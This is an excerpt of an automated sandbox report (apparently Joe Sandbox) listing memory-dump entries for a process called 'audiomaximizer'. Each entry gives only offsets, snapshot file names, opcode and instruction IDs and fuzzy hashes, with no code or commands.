                                                                                                                                                                                • Source File: 00000008.00000002.4172008725.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_5d00000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                • Opcode ID: bc43d98c8985d2cb6a634966f7823827bf12dc9160d52d7a6ecd84329ca44b92
                                                                                                                                                                                • Instruction ID: b6394e84fddd2851b681757f17a495e72fdc13cc1ee46a2255e44303dc870489
                                                                                                                                                                                • Opcode Fuzzy Hash: bc43d98c8985d2cb6a634966f7823827bf12dc9160d52d7a6ecd84329ca44b92
                                                                                                                                                                                • Instruction Fuzzy Hash: D111FEB58003499FCB10DF9AC884BDEBBF8EB48320F10845AE959A7250C375A984CFA5
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (o^q
                                                                                                                                                                                • API String ID: 0-74704288
                                                                                                                                                                                • Opcode ID: a8d11ab3196559dc5c8bdaeb036ee12972abba806904a947a2fd9d0d8d8820b8
                                                                                                                                                                                • Instruction ID: 416000c61a7ec988bd572b0811d297ea18d9910befd33b3de2e56ede28ca9643
                                                                                                                                                                                • Opcode Fuzzy Hash: a8d11ab3196559dc5c8bdaeb036ee12972abba806904a947a2fd9d0d8d8820b8
                                                                                                                                                                                • Instruction Fuzzy Hash: 0B41E6317042449FCB15AFA9CC546AE7FF6BFC9610F1845AAE906DB395CE319C06CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2199105c806f2158f9df9714d9b0eb9fade2348dc54758ea77c401f9eda8ede0
                                                                                                                                                                                • Instruction ID: 97ad647495936fbe96eba98be70f0fb07cec64b3db4b497a1b885aa7ae707cc3
                                                                                                                                                                                • Opcode Fuzzy Hash: 2199105c806f2158f9df9714d9b0eb9fade2348dc54758ea77c401f9eda8ede0
                                                                                                                                                                                • Instruction Fuzzy Hash: 5D12A8350612538FD7602B74EEBC02EBE64FB0F323385BC81E55B854599B7264A8CF62
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f5765e657e4b9eaac5f4b152926a618b6952ca6c4e6ee63fc76752c1a143204e
                                                                                                                                                                                • Instruction ID: 94bb18792ddad8ee175f03f0de30eb67c6103c27e01a7299529c03db7eaecc49
                                                                                                                                                                                • Opcode Fuzzy Hash: f5765e657e4b9eaac5f4b152926a618b6952ca6c4e6ee63fc76752c1a143204e
                                                                                                                                                                                • Instruction Fuzzy Hash: 2C12A8350612538F97602B74EEBC02EBE64FB0F323384BC80E15B854599B7274A8CF62
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b82017f10ea4b489d719f7fcb62c7c2be38b11eac67dc8736ba8add892d48191
                                                                                                                                                                                • Instruction ID: a309f7f13616ab8a3d59007c1d411da18e9948b9ead9513e1f56122931aa6c68
                                                                                                                                                                                • Opcode Fuzzy Hash: b82017f10ea4b489d719f7fcb62c7c2be38b11eac67dc8736ba8add892d48191
                                                                                                                                                                                • Instruction Fuzzy Hash: 1D714B347006068FDB25EF6CCCA4A6E7BEAAF49301B5581A9E915DB371DB70DC41CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4176023569.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_6ed0000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 216ec13d8f63724e0a29a3330bd357d7967855f36701b11328f889b6dee77752
                                                                                                                                                                                • Instruction ID: a03fae124583f68cc6dc28eac1c8ea2617abd889f17cdf45eb66f6139f890b52
                                                                                                                                                                                • Opcode Fuzzy Hash: 216ec13d8f63724e0a29a3330bd357d7967855f36701b11328f889b6dee77752
                                                                                                                                                                                • Instruction Fuzzy Hash: 1171B074E00208CFDB54DFA9D994ADEBBB2EF88300F249129D414BB364DB399982CF54
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3eab5aec29ccb9b47a41ea74f556fac87fa4f0dfe95aee119ed7dab18a600647
                                                                                                                                                                                • Instruction ID: a90743bb6170bf52918a1a73f6aa7f5eadc06b8f4166db86275bf95db94a2d1a
                                                                                                                                                                                • Opcode Fuzzy Hash: 3eab5aec29ccb9b47a41ea74f556fac87fa4f0dfe95aee119ed7dab18a600647
                                                                                                                                                                                • Instruction Fuzzy Hash: 42610134D01218DFDB14DFA5D984BAEBBB2FF88300F608569D809AB3A4DB355986CF40
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6b417f8f16c46e66905df64916dff2f6fab91bce28fbcf62e4375650307cacd7
                                                                                                                                                                                • Instruction ID: 0e75ffbdf21b651c29f131f4a828db262fe64dbd75cb527cb20069fcdd6c946f
                                                                                                                                                                                • Opcode Fuzzy Hash: 6b417f8f16c46e66905df64916dff2f6fab91bce28fbcf62e4375650307cacd7
                                                                                                                                                                                • Instruction Fuzzy Hash: 15517474E012189FDB54DFA9D5849DDBBF2FF89310F24816AE819AB364DB309905CF50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e47a2d712d09c8d1299461f0c70cfbd6018495875be83358ea1da08bf9852def
                                                                                                                                                                                • Instruction ID: 7dae4f8377470f269d0177bea1425f62d03a44ddb5f360bdd93266861c3e9d58
                                                                                                                                                                                • Opcode Fuzzy Hash: e47a2d712d09c8d1299461f0c70cfbd6018495875be83358ea1da08bf9852def
                                                                                                                                                                                • Instruction Fuzzy Hash: 4A51A474E01209CFCB08DFA9D99499DBBB2FF89300B209169E815BB324DB35AD42CF55
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b8cb23be4858db5e7a99caead34598cee582447100a3bdf36a07a948b47f4138
                                                                                                                                                                                • Instruction ID: 2d9121936e0f839a1a6c571732a899c44520dc6d52db31f2c0bd6ef7c58f45ae
                                                                                                                                                                                • Opcode Fuzzy Hash: b8cb23be4858db5e7a99caead34598cee582447100a3bdf36a07a948b47f4138
                                                                                                                                                                                • Instruction Fuzzy Hash: DB418C31A04249DFCF12DFE8CC44A9DBFB2AF49350F048656EA45AB3A2D370E915CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4176023569.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_6ed0000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d81fdaf94ed1cacad2fd93d23070b45778715d97fb01e8bb602687b04a1324ab
                                                                                                                                                                                • Instruction ID: 915767282f17a84df86dd652350a6b8ea4f01c3aa55db8bfef3716627eb4b53c
                                                                                                                                                                                • Opcode Fuzzy Hash: d81fdaf94ed1cacad2fd93d23070b45778715d97fb01e8bb602687b04a1324ab
                                                                                                                                                                                • Instruction Fuzzy Hash: 4D31C370E012088FDB58DFAAD9546DEBBF2AF89300F24E12AD418BB254DB355A42CF54
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b222b0a4f6f123793d6a8f0be78a3725902a4fe8c9d21546e80e865a910d7741
                                                                                                                                                                                • Instruction ID: b52e3de7def1b7835cf93083838ec687ec1490ab130dfa096ea7402d63752d78
                                                                                                                                                                                • Opcode Fuzzy Hash: b222b0a4f6f123793d6a8f0be78a3725902a4fe8c9d21546e80e865a910d7741
                                                                                                                                                                                • Instruction Fuzzy Hash: 71318E3120020ADFCF15AF69DC54AAF7BA6FB98201F408429FA1697354CB39DD61DFA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 32217678553840f3740286a2cc4048384b9ea6ae4bd04649fae144d2a118aa8c
                                                                                                                                                                                • Instruction ID: 043304af523933e07775ca29ad8e118ab080e79c38c899f77d460f249e14269b
                                                                                                                                                                                • Opcode Fuzzy Hash: 32217678553840f3740286a2cc4048384b9ea6ae4bd04649fae144d2a118aa8c
                                                                                                                                                                                • Instruction Fuzzy Hash: D621AF323022054BEB257A2D8C5463E76ABAFC4748FA4813DD506CB79AEB65CC439781
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e58578a9edf60c7f4c181238ec57518fa4d0ea118e93ec740e65edfe391070d7
                                                                                                                                                                                • Instruction ID: 256f6747c005cc82608d1d4cf43e456c9a1059cadfe40b51966b91b5dd02c132
                                                                                                                                                                                • Opcode Fuzzy Hash: e58578a9edf60c7f4c181238ec57518fa4d0ea118e93ec740e65edfe391070d7
                                                                                                                                                                                • Instruction Fuzzy Hash: 03212F353006218FD725AB29DC6492EB7A2FFC97457089279E906CB3A4CF35DC028F80
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2043800ffd649d94eb38002345c72d1a3c8ef180cdfcb2167a9cb50b74dffa5c
                                                                                                                                                                                • Instruction ID: e145304e2b3226f7af4e75370c6d9d2abc2b1dfd086fc900eb55e3541d2faeea
                                                                                                                                                                                • Opcode Fuzzy Hash: 2043800ffd649d94eb38002345c72d1a3c8ef180cdfcb2167a9cb50b74dffa5c
                                                                                                                                                                                • Instruction Fuzzy Hash: 51219075A001059FCF15EF28C8509EE77B5EB9D6A4B10C55ED84A9B340DB38EA43CBD2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4130674789.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_144d000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 54524dc078314c268712fa95a8d3c60b0d7bb99c7a373024cf8b5fe8da5f7ed7
                                                                                                                                                                                • Instruction ID: ba450afca442d17995d759db2dd781c81850b7dbf35033e04bdc47a286b8f768
                                                                                                                                                                                • Opcode Fuzzy Hash: 54524dc078314c268712fa95a8d3c60b0d7bb99c7a373024cf8b5fe8da5f7ed7
                                                                                                                                                                                • Instruction Fuzzy Hash: E7212971A04204DFEB05DF98D5C0B27BFA5FB94314F24C56ED9094B366C336D846CA61
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4130674789.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_144d000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5bd5d9ada1de3f4c31835fa0d7b94dc28bd0866c88441e7656caf474fb7f412c
                                                                                                                                                                                • Instruction ID: 6ac73f41bfd78d68955034cb205940727f339b40184700ad79df3168a6f90ca7
                                                                                                                                                                                • Opcode Fuzzy Hash: 5bd5d9ada1de3f4c31835fa0d7b94dc28bd0866c88441e7656caf474fb7f412c
                                                                                                                                                                                • Instruction Fuzzy Hash: E7212671A04200DFEB05DF58D9C4B26BBA5FB94314F24C56EEC4A4B366C376D846CA61
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 381c67c619cb0d1c4b6efc1af44f6f0c6e5fdb3ef45b1de61e1a1c1d701a70ad
                                                                                                                                                                                • Instruction ID: 858540d45451cc114b8b9bc2007835cb7355dad5db3e8fa20234c7757a06ab1e
                                                                                                                                                                                • Opcode Fuzzy Hash: 381c67c619cb0d1c4b6efc1af44f6f0c6e5fdb3ef45b1de61e1a1c1d701a70ad
                                                                                                                                                                                • Instruction Fuzzy Hash: 22212631605249CFCB05BF68EC547AF3BA1FBA9211F008169F9069B365CB398D61CF91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 75012388e5178209f52f253d1f60e3ee921b182e4f14d297d7936b22fe67386d
                                                                                                                                                                                • Instruction ID: 42ecbb25853037d2dc0790608fa470ffd9a030f6a59dc78cbd8362777e3816ff
                                                                                                                                                                                • Opcode Fuzzy Hash: 75012388e5178209f52f253d1f60e3ee921b182e4f14d297d7936b22fe67386d
                                                                                                                                                                                • Instruction Fuzzy Hash: 60218570A012499FCB15DFA5D950AEEBFB6EF88309F248469E401A6290CB34A941CF60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9df63a46f4a8007fde855ecb02ad2f005ff1685e20c320c6859b762c73ba4874
                                                                                                                                                                                • Instruction ID: a7febece36ce08821236ad4eec3fef1696246ae685d9cdd37842f672fccbc0f9
                                                                                                                                                                                • Opcode Fuzzy Hash: 9df63a46f4a8007fde855ecb02ad2f005ff1685e20c320c6859b762c73ba4874
                                                                                                                                                                                • Instruction Fuzzy Hash: F72181B0D402099FDB44EFA9D980B9EBFF2FB44300F1092B9D554A7364EB745A458B81
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3a74c6914725dee214719310fcb1198f6bdc45778ea6d93db50c88d5a63b0e14
                                                                                                                                                                                • Instruction ID: 459bee11d03492d6f5b4e8e53b0ce652dc1b863f5a4b44a1c0a8a64e29b471b5
                                                                                                                                                                                • Opcode Fuzzy Hash: 3a74c6914725dee214719310fcb1198f6bdc45778ea6d93db50c88d5a63b0e14
                                                                                                                                                                                • Instruction Fuzzy Hash: 5D1104353006119FD7296B2EDC6492EBBA6FFC97523085178EA06CB364CF31EC028B90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5069fa13e085a1705de808d7cdce0cac74041023d3952b988f24671ca50beb22
                                                                                                                                                                                • Instruction ID: 8c0788885cf8cd07469a0a7f3662d61f8068dfc374a2f9a92b07379b7dc6fded
                                                                                                                                                                                • Opcode Fuzzy Hash: 5069fa13e085a1705de808d7cdce0cac74041023d3952b988f24671ca50beb22
                                                                                                                                                                                • Instruction Fuzzy Hash: 6521EFB4C1020A8FCB40EFA8D8445EEBFF0FF0A310F10516AD909B2214EB301A95CFA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: adb9a49a56674601ce05ba674653de3bc0c5cd63abf5fcb1b89068d2ccef1d61
                                                                                                                                                                                • Instruction ID: b06cb5d249f88cfe2bfb796bb2a42459987bf6432c1fcdc896e57b39ffd24328
                                                                                                                                                                                • Opcode Fuzzy Hash: adb9a49a56674601ce05ba674653de3bc0c5cd63abf5fcb1b89068d2ccef1d61
                                                                                                                                                                                • Instruction Fuzzy Hash: B2114C70D402099FDB44EFB9D980A9EBFF2FB44304F1096B9D518AB364EB385A45CB81
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4130674789.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_144d000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                • Instruction ID: ad9efe1703342a22a680a780e980517727656a4d68c11b228d1936307971a549
                                                                                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                • Instruction Fuzzy Hash: C711BB75904280CFEB02CF54D5C4B16BFA2FB84318F24C6AAD8494B766C33AD80ACB61
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4130674789.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_144d000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                • Instruction ID: 955527e72c30c13d28097985b22d938a780cb90ca4f7e462f03a66a1d2a1aa1b
                                                                                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                • Instruction Fuzzy Hash: 9F118B75904280DFEB06CF58D9C4B16BFA1FB94314F28C6AADC494B766C33AD44ACB61
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 172d627b08e80962336254262eab6e6abd6f967a82e05f53005a0bce7223635c
                                                                                                                                                                                • Instruction ID: 53c467ad54868da203c1a0e355eb496b7ae16f85a1b104797610a4ea35a3e92c
                                                                                                                                                                                • Opcode Fuzzy Hash: 172d627b08e80962336254262eab6e6abd6f967a82e05f53005a0bce7223635c
                                                                                                                                                                                • Instruction Fuzzy Hash: 261169713006419FC715DF7ED484855BBF6EF8A61431982AAE049CB732EB30EC4ADB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 637f88edad323c0917bbb8930df32388318c4aa76dea872bb4f63554719fd84b
                                                                                                                                                                                • Instruction ID: af341c3f245f480ea3aec749e2184061bc6030c57a5bbd37fb1e9ea098a87dbc
                                                                                                                                                                                • Opcode Fuzzy Hash: 637f88edad323c0917bbb8930df32388318c4aa76dea872bb4f63554719fd84b
                                                                                                                                                                                • Instruction Fuzzy Hash: FF0128327001556FCB229E699C10AEF7FA6EFCD640B08815AF545C7284CF718C129B90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4de89ab5de7428dc20140c34097a45e5e4c086bb35898059c73471eecf0d8c34
                                                                                                                                                                                • Instruction ID: 955cdd12fccd9d08cd06b63c5977fcfb9d1bc773cd5d59aa5381a4f226a45cee
                                                                                                                                                                                • Opcode Fuzzy Hash: 4de89ab5de7428dc20140c34097a45e5e4c086bb35898059c73471eecf0d8c34
                                                                                                                                                                                • Instruction Fuzzy Hash: 2E112574D0420A9FDF41CFA8E8859EEBBB1FB8A300F10816AD954A3360D7385E56DF91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4fbae3cbfc9381618324ba7f867c4c33d82bade257aece735c5a2d0d08a12ac7
                                                                                                                                                                                • Instruction ID: 005814352cad1d6fdbb62bc14841f40a07536d20e338770c5aa902766ff2b2ef
                                                                                                                                                                                • Opcode Fuzzy Hash: 4fbae3cbfc9381618324ba7f867c4c33d82bade257aece735c5a2d0d08a12ac7
                                                                                                                                                                                • Instruction Fuzzy Hash: 5001D831E083446FDB225F75DC406AEBFB1EF46620F0541EAE68187682D7786815CBA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6a858927fdeab78ef10a777ba43a6eefa8fd08e72d248953b3dea9dede9bc5aa
                                                                                                                                                                                • Instruction ID: 22ec4cbbf4ae6ad5fd1379d987f8726c428714ca454f90988d003962382b7fa0
